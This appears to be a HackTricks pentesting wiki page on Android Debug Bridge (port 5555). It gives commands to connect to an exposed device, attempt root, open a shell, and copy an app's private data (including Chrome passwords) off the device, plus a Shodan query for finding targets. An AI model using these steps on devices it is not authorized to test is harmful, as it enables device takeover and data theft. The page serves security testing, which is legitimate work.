5555 - Android Debug Bridge

☁️ HackTricks Cloud ☁️ -🐦 Twitter 🐦 - 🎙️ Twitch 🎙️ - 🎥 Youtube 🎥

Do you work in a cybersecurity company? Do you want to see your company advertised in HackTricks? or do you want to have access to the latest version of the PEASS or download HackTricks in PDF? Check the SUBSCRIPTION PLANS!
Discover The PEASS Family, our collection of exclusive NFTs
Get the official PEASS & HackTricks swag
Join the 💬 Discord group or the telegram group or follow me on Twitter 🐦@carlospolopm.
Share your hacking tricks by submitting PRs to the hacktricks repo and hacktricks-cloud repo.

Basic Information

Android Debug Bridge (adb) is a versatile command-line tool that lets you communicate with a device. The adb command facilitates a variety of device actions, such as installing and debugging apps, and it provides access to a Unix shell that you can use to run a variety of commands on a device. (from here)

Default port: 5555.

PORT     STATE SERVICE VERSION
5555/tcp open  adb     Android Debug Bridge device (name: msm8909; model: N3; device: msm8909)

Connect

If find the ADB service running in a port of a device and you can connect to it, you can get a shell inside the system:

adb connect 10.10.10.10
adb root # Try to escalate to root
adb shell

For more ADB commands check the following page:

{% content-ref url="../mobile-pentesting/android-app-pentesting/adb-commands.md" %} adb-commands.md {% endcontent-ref %}

Dump App data

In order to completely download the data of an application you can:

# From a root console
chmod 777 /data/data/com.package
cp -r /data/data/com.package /sdcard Note: Using ADB attacker cannot obtain data directly by using command " adb pull /data/data/com.package". He is compulsorily required to move data to Internal storage and then he can pull that data.
adb pull "/sdcard/com.package"

You can use this trick to retrieve sensitive information like chrome passwords. For more info about this check the information a references provided here.

Shodan

android debug bridge